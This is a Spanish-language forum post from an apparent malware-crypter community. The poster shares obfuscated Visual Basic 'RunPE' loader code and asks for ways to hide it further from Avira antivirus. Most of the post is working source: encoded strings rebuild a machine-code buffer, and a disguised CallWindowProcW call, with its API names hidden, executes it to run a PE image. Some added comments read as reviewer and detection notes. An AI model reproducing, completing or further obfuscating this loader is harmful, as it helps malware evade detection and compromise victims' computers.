Hola Indetectables, bueno, en mi lucha contra el Avira y su Dropper de los huevos he llegado hasta aquí. Quité la API del CallWindowProcW con la ayuda del post de Lucho y me quedé con que el Avira detecta esto:

MOMomomoM VarPtr(FeKu0flX5(0)), StrPtr(AAABBBBccccDDD1), VarPtr(THv2YiUoo(0)), 0, 0

RunPe:


' Module-level state shared by the routines below (all identifiers are randomized).
' Loop counter used by the string decoder TaUBb5pA4.
Dim ObEBPmR0L          As Integer
' Table of eight encoded string literals (indices 0..7), filled in HJFG6Al5J.
Private XhIdIZQk7(7)                   As String
' Outer loop index over the eight table entries.
Dim gy0bMAzUI                     As Long
' Inner loop index: character offset inside one table entry.
Dim rhAmWHlhM                            As Long
' Write position inside the byte buffer FeKu0flX5.
Dim pwka6sCnw                As Long
' 1288-byte buffer (0..1287) rebuilt at run time from the encoded strings;
' its address is later passed as the function pointer argument of MOMomomoM.
Private FeKu0flX5(1287)                                  As Byte
' Loop counter used by the string decoder RRRrrrRRR.
Dim PPPpppPPP           As Integer
' Instance of class asdcdc, which is not shown on this page; MOMomomoM calls its
' TTTtttTTT method. NOTE(review): presumably a call-by-name API invoker - confirm.
Dim QQQqqqqQQQq As New asdcdc

' Entry point of the posted stub. Rebuilds the byte buffer FeKu0flX5 from eight
' encoded string literals and then passes the buffer's address to MOMomomoM.
'   STPCKgHor - string; a copy of it is passed by StrPtr as the second argument.
'   THv2YiUoo - byte array; the address of element 0 is passed as the third argument.
' NOTE(review): the post labels this "RunPe", so STPCKgHor is presumably a host
' path and THv2YiUoo a PE image - neither is verifiable from this listing.
Public Sub HJFG6Al5J(ByVal STPCKgHor As String, THv2YiUoo() As Byte)
' Each table entry is decoded by TaUBb5pA4 with the shift key given as the second
' argument. The loop below consumes 805 characters of every entry in groups of five.
XhIdIZQk7(0) = TaUBb5pA4("RSb<6RSbK>RSb:KRSb66RSb66RSb66RSb<HRSb66RSb<;RSb66RSb=8RSb66RSb<KRSb66RSb<;RSb66RSb<IRSb66RSb99RSb66RSb98RSb66RSb66RSb66RSb<KRSb66RSb=:RSb66RSb<:RSb66RSb<IRSb66RSb<IRSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb;HRSb>HRSbLIRSb<GRSb:8RSbK>RSbHHRSb69RSb66RSb66RSb>HRSb;:RSb8:RSb8>RSb>?RSb77RSb>HRSb;:RSb8:RSb8IRSb<GRSb9KRSbK>RSbGGRSb69RSb66RSb66RSb>?RSb77RSb<GRSb:GRSbK>RSbG7RSb69RSb66RSb66RSb>?RSb9?RSb<GRSb7KRSb<GRSb9IRSbK>RSb?JRSb69RSb66RSb66RSb<GRSb88RSb<>RSbL:RSb66RSb66RSb66RSbK>RSb?7RSb69RSb66RSb66RSb<GRSb8<RSb<GRSb8:RSbK>RSb>>RSb69RSb66RSb66RSb<GRSb8GRSb<GRSb:6RSbK>RSb=LRSb69RSb66RSb66", "6")
XhIdIZQk7(1) = TaUBb5pA4("TUd>ITUd:MTUd>ITUd8KTUdM@TUd?>TUd8;TUd88TUd88TUd>ITUd;:TUd>@TUdK@TUd88TUd88TUd88TUdM@TUd>ITUd8;TUd88TUd88TUd>ITUd:ITUdM@TUd=KTUd8;TUd88TUd88TUd@JTUd8ATUdK?TUd89TUd<<TUd88TUd88TUd88TUd>ITUd9:TUdM@TUd<LTUd8;TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUd?ATUd8;TUd88TUd88TUd>ITUd;MTUdM@TUd;JTUd8;TUd88TUd88TUd@JTUdL9TUd>ITUd9MTUdM@TUd;:TUd8;TUd88TUd88TUd>ITUd<8TUdNNTUd;:TUdNNTUd;9TUdNNTUdL8TUd>ITUd9:TUdM@TUd:;TUd8;TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUd<NTUd8;TUd88TUd88TUd>ITUd9MTUdM@TUd99TUd8;TUd88TUd88TUd@JTUd8ATUd@JTUd=9TUd;KTUd>ITUd;MTUdM@TUd8=TUd8;TUd88TUd88TUd@JTUd;ATUd8;TUdNITUd>ITUd::TUdM@TUdNITUd8:TUd88TUd88TUd@JTUd8ATUd>@TUdN@TUd88TUd88TUd88TUd=?TUd=9TUdNNTUdL8TUd>ITUd88TUdM@TUdM@TUd8:TUd88TUd88TUd>@TUd@@TUdNMTUdJ;TUd9>TUd=9TUdM@TUd9<TUd8;TUd88TUd88TUd>ITUd:MTUdM@TUdL>TUd8:TUd88", "8")
XhIdIZQk7(2) = TaUBb5pA4("STc77STc?ISTc:@STc=HSTc9HSTcL?STcJKSTc79STc77STc77STc?ISTc88STc=HSTc;9STcL?STcJ;STc79STc77STc77STc<>STc<9STc=HSTc77STc=HSTc77STc=HSTc7;STc=HSTc77STc=HSTc77STc=HSTc77STc=HSTc77STcMMSTc:8STcMMSTcK7STc=HSTc89STcL?STcH@STc79STc77STc77STc=?STcK7STc:>STc87STcM9STc<8STcL?STcK<STc79STc77STc77STc=HSTc99STcL?STc@>STc79STc77STc77STc?ISTc88STc=HSTc9LSTcL?STc?LSTc79STc77STc77STc?ISTc7@STcMMSTc>9STc:;STcMMSTc:8STcMMSTcK7STc=HSTc77STcL?STc>LSTc79STc77STc77STc=?STc@JSTc@<STc8HSTc=LSTc<8STcL?STcHHSTc79STc77STc77STc=HSTc99STcL?STc=JSTc79STc77STc77STc?ISTc88STc?ISTc:@STc=HSTc9LSTcL?STc=8STc79STc77STc77STc?ISTc7@STc=HSTc;7STc=?STc77STc:7STc77STc77STcMMSTc>9STc<7STcMMSTc>>STc:;STcMMSTc:8STcMMSTcK7STc=HSTc:=STcL?STc;>STc79STc77STc77STc?ISTcK8STc=HSTc99STcL?STc:LSTc79STc77STc77STc?ISTc:@STc=HSTc:LSTcL?STc:<STc79STc77", "7")
XhIdIZQk7(3) = TaUBb5pA4("OP_33OP_;EOP_64OP_9DOP_55OP_H;OP_5FOP_35OP_33OP_33OP_;EOP_34OP_9DOP_5HOP_H;OP_56OP_35OP_33OP_33OP_;EOP_3<OP_85OP_IIOP_::OP_87OP_89OP_IIOP_:3OP_67OP_IIOP_64OP_9DOP_33OP_H;OP_43OP_35OP_33OP_33OP_9;OP_D4OP_9DOP_6GOP_G;OP_84OP_H;OP_6FOP_35OP_33OP_33OP_;6OP_F7OP_3FOP_IIOP_G3OP_9DOP_45OP_H;OP_I<OP_34OP_33OP_33OP_9;OP_8EOP_H;OP_47OP_FIOP_84OP_H;OP_58OP_35OP_33OP_33OP_9DOP_55OP_H;OP_H:OP_34OP_33OP_33OP_;EOP_44OP_;6OP_F5OP_39OP_9DOP_6DOP_H;OP_GEOP_34OP_33OP_33OP_9DOP_35OP_85OP_84OP_IIOP_G3OP_9DOP_69OP_H;OP_FHOP_34OP_33OP_33OP_F:OP_34OP_33OP_33OP_33OP_33OP_E;OP_5;OP_33OP_33OP_33OP_9DOP_69OP_H;OP_EFOP_34OP_33OP_33OP_I:OP_54OP_9DOP_4HOP_H;OP_E6OP_34OP_33OP_33OP_;EOP_44OP_;EOP_85OP_6FOP_;4OP_F5OP_I;OP_33OP_33OP_33OP_36OP_G3OP_9DOP_6HOP_H;OP_<IOP_34OP_33OP_33OP_36OP_44OP_9DOP_59OP_H;OP_<9OP_34OP_33OP_33OP_9D", "3")
XhIdIZQk7(4) = TaUBb5pA4("TUd:@TUd=:TUdNNTUd;9TUd>ITUd9:TUdM@TUd@ITUd89TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUdJ>TUd89TUd88TUd88TUd@;TUdK<TUd8KTUdNNTUdL8TUd>ITUd:>TUdM@TUd?;TUd89TUd88TUd88TUd@JTUd;ATUd@JTUd8ATUd@JTUd?9TUd9<TUd>ITUd;MTUdM@TUd>=TUd89TUd88TUd88TUd8;TUd;9TUd>ITUd:>TUdM@TUd=KTUd89TUd88TUd88TUd@JTUd8ATUd@JTUd=9TUd8KTUd>ITUd::TUdM@TUd=8TUd89TUd88TUd88TUd@JTUd8ATUd8;TUd=9TUd;<TUd>ITUd<>TUdM@TUd<<TUd89TUd88TUd88TUd@JTUdK9TUd>ITUd:MTUdM@TUd;JTUd89TUd88TUd88TUd@JTUd8ATUd=8TUdNNTUd??TUd98TUd=>TUd=:TUdNNTUd;9TUd>ITUd88TUdM@TUd:ITUd89TUd88TUd88TUd>@TUdI9TUd>ITUd;LTUdL@TUd=9TUdM@TUd=>TUd89TUd88TUd88TUd@;TUdK<TUd8KTUdNNTUdL8TUd>ITUd;>TUdM@TUd9;TUd89TUd88TUd88TUd@JTUd99TUd@;TUdK:TUd89TUd@ATUd99TUd>ITUd;ITUdM@TUd8=TUd89TUd88TUd88TUd@JTUd8ATUd;JTUdKITUd8NTUd@=TUd;;TUdNNTUdNNTUdNNTUd>ITUd;:TUdM@TUdN<TUd88TUd88TUd88", "8")
XhIdIZQk7(5) = TaUBb5pA4("NO^:DNO^2;NO^E9NO^23NO^29NO^22NO^23NO^22NO^8CNO^22NO^G:NO^G7NO^22NO^22NO^22NO^8:NO^F4NO^E9NO^C9NO^8:NO^73NO^G:NO^33NO^23NO^22NO^22NO^8CNO^54NO^G:NO^F5NO^22NO^22NO^22NO^:DNO^33NO^8CNO^4GNO^G:NO^ECNO^22NO^22NO^22NO^:DNO^2;NO^74NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^44NO^G:NO^DDNO^22NO^22NO^22NO^:DNO^5;NO^:5NO^E9NO^56NO^8CNO^54NO^G:NO^CHNO^22NO^22NO^22NO^:DNO^53NO^:DNO^D8NO^C6NO^22NO^22NO^22NO^:5NO^E8NO^2:NO^8CNO^4GNO^G:NO^;FNO^22NO^22NO^22NO^:DNO^33NO^8CNO^68NO^G:NO^;6NO^22NO^22NO^22NO^73NO^8CNO^26NO^79NO^78NO^HHNO^54NO^8CNO^22NO^G:NO^:8NO^22NO^22NO^22NO^8:NO^C3NO^8CNO^5FNO^F:NO^73NO^G:NO^D4NO^22NO^22NO^22NO^:5NO^E6NO^2ENO^HHNO^F2NO^8CNO^44NO^G:NO^8HNO^22NO^22NO^22NO^:DNO^2;NO^:DNO^73NO^4:NO^25NO^73NO^56NO^8CNO^54NO^G:NO^82NO^22NO^22NO^22NO^:DNO^2;NO^:3NO^E3NO^D2NO^22NO^22NO^22NO^:;NO^33NO^8CNO^22NO^G:", "2")
XhIdIZQk7(6) = TaUBb5pA4("NO^6HNO^22NO^22NO^22NO^8:NO^F5NO^E9NO^C9NO^G:NO^73NO^G:NO^9DNO^22NO^22NO^22NO^8CNO^54NO^G:NO^5FNO^22NO^22NO^22NO^:DNO^F3NO^8CNO^4GNO^G:NO^56NO^22NO^22NO^22NO^:DNO^2;NO^HHNO^54NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^22NO^G:NO^46NO^22NO^22NO^22NO^8:NO^::NO^5HNO^6CNO^;GNO^73NO^G:NO^72NO^22NO^22NO^22NO^8CNO^4GNO^G:NO^34NO^22NO^22NO^22NO^:DNO^2;NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^6CNO^G:NO^26NO^22NO^22NO^22NO^:DNO^43NO^83NO^E5NO^:DNO^EDNO^25NO^6ENO^46NO^26NO^E5NO^8CNO^22NO^G:NO^H4NO^HHNO^HHNO^HHNO^8:NO^76NO^ECNO^CHNO^;3NO^73NO^G:NO^3GNO^22NO^22NO^22NO^8CNO^62NO^8:NO^22NO^32NO^22NO^22NO^HHNO^96NO^46NO^3:NO^8CNO^22NO^HHNO^F2NO^HHNO^96NO^46NO^36NO^G:NO^EHNO^HHNO^HHNO^HHNO^:;NO^23NO^:5NO^E6NO^32NO^E5NO^G:NO^44NO^22NO^22NO^22NO^8:NO^C6NO^6GNO^2GNO^GENO^72NO^G:NO^6DNO^22NO^22NO^22NO^:5NO^E6NO^2:NO^HHNO^96NO^46NO^26", "2")
XhIdIZQk7(7) = TaUBb5pA4("STcMMSTcK7STcMMSTc>;STc9;STc7?STc<7STcL?STc:?STc77STc77STc77STc?:STcJ;STc7?STcJ:STc<<STc<9STc<8STc<:STc<=STc<>STc::STcJ7STc=;STc?ISTc>7STc:7STc?ISTc>=STc7JSTc?ISTc>=STc8JSTc?ISTc=LSTc7?STc?ISTc>LSTc97STc?ISTc:=STc:?STc;>STc8?STc><STcM:STc?7STc:MSTc=ISTc>;STc7>STc?7STc:MSTc;ISTc>;STc79STcLISTcL>STc?ISTcJ<STc<MSTc<LSTc<ISTc<@STc<HSTc<KSTcJ:STc<<STc<9STc<8STc<:STc<=STc<>STc?ISTc=JSTc9;STc8JSTc?<STcLKSTc>;STc;:STc?ISTc;<STc:JSTc?ISTc<;STc9?STc>?STc7:STcK<STc?ISTc;HSTc8?STc?ISTc<HSTc97STc7:STcKKSTcL:STc:7STc;@STc?ISTc:;STc?ISTc7:STcM<STc::STcMMSTc::STcJ7STcMJSTcHJSTc?;STcJ7STc>;STc7>STcJ8STcJMSTc7KSTc7:STcM?STcLISTcM;STc:ISTc>JSTc9;STc97STc><STcL8STc?ISTc<HSTc9;STc7:STcKKSTc==STc?ISTc7JSTc;ISTc?ISTc<HSTc8JSTc7:STcKKSTc?ISTc7;STc?ISTc7:STcJ<STc<MSTc<LSTc<ISTc<@STc<HSTc<KSTcJ:STcJ:STc77STc77STc77STc77", "7")
' 8 entries x 161 five-character groups = 1288 bytes, matching FeKu0flX5(0..1287).
For gy0bMAzUI = 0 To 7
For rhAmWHlhM = 1 To 805 Step 5
' After decoding, every group is the marker "LM\" followed by two hex digits.
' Replace swaps the marker for Chr(38) & Chr(72), i.e. "&H", and assigning the
' resulting "&Hxx" string to a Byte element makes VB coerce it to that byte value.
FeKu0flX5(pwka6sCnw) = Replace(Mid(XhIdIZQk7(gy0bMAzUI), rhAmWHlhM, 5), TaUBb5pA4("TUd", "8"), Chr(Val(TaUBb5pA4(";@", "8"))) & Chr(Val(TaUBb5pA4("@;", "9")))): pwka6sCnw = pwka6sCnw + 1
Next rhAmWHlhM
Next gy0bMAzUI
' Local copy of the string argument so StrPtr can be taken of it.
Dim AAABBBBccccDDD1 As String
AAABBBBccccDDD1 = STPCKgHor
' Detection note: the buffer address is passed in the lpPrevWndFunc position of a
' CallWindowProcW-shaped wrapper, so the API call transfers execution into bytes
' that were assembled at run time. This is the line the poster reports as flagged.
MOMomomoM VarPtr(FeKu0flX5(0)), StrPtr(AAABBBBccccDDD1), VarPtr(THv2YiUoo(0)), 0, 0 
End Sub

' String decoder: subtracts sq2H54bhy from the character code of every character
' of YWYce09KC (a fixed-shift substitution) and returns the result.
'   YWYce09KC - encoded text; no ByVal is given, so it is rewritten in place.
'   sq2H54bhy - shift amount; callers on this page pass it as a string literal
'               such as "8", which VB coerces to Integer.
' No return type is declared, so the function returns a Variant.
Public Function TaUBb5pA4(YWYce09KC As String, sq2H54bhy As Integer)
' ObEBPmR0L is the module-level counter, not a local.
For ObEBPmR0L = 1 To Len(YWYce09KC)
' Mid on the left-hand side overwrites one character in place.
Mid(YWYce09KC, ObEBPmR0L, 1) = Chr(Asc(Mid(YWYce09KC, ObEBPmR0L, 1)) - sq2H54bhy)
Next ObEBPmR0L
TaUBb5pA4 = YWYce09KC
End Function
' Wrapper that keeps the parameter list of CallWindowProcW but carries no Declare
' statement for it. The two RRRrrrRRR calls decode to "USER32" and
' "CallWindowProcW"; both names plus the five arguments are forwarded to
' QQQqqqqQQQq.TTTtttTTT, and its result is returned.
' NOTE(review): TTTtttTTT lives in class asdcdc, which is not on this page; it
' presumably resolves the export by name and invokes it - confirm against that class.
' Detection note: with the API name present only in shifted form and no Declare
' statement, rules should key on the decoded strings or on the run-time call with
' a data-buffer address in lpPrevWndFunc rather than on a static declaration.
Public Function MOMomomoM(ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
MOMomomoM = QQQqqqqQQQq.TTTtttTTT(RRRrrrRRR("][MZ;:", "8"), RRRrrrRRR("FdooZlqgrzSurfZ", "3"), lpPrevWndFunc, hWnd, Msg, wParam, lParam)
End Function

' String decoder with the same logic as TaUBb5pA4 under different names: subtracts
' second from the character code of every character of strInput and returns it.
'   strInput - encoded text; no ByVal is given, so it is rewritten in place.
'   second   - shift amount; MOMomomoM passes it as a string literal ("8", "3"),
'              which VB coerces to Integer.
' No return type is declared, so the function returns a Variant.
Public Function RRRrrrRRR(strInput As String, second As Integer)
' PPPpppPPP is the module-level counter, not a local.
For PPPpppPPP = 1 To Len(strInput)
' Mid on the left-hand side overwrites one character in place.
Mid(strInput, PPPpppPPP, 1) = Chr(Asc(Mid(strInput, PPPpppPPP, 1)) - second)
Next PPPpppPPP
RRRrrrRRR = strInput
End Function
¿Alguna idea de cómo ofuscarlo? Porque me quedé sin ideas.
Saludos Bros
Skype: naker.noventa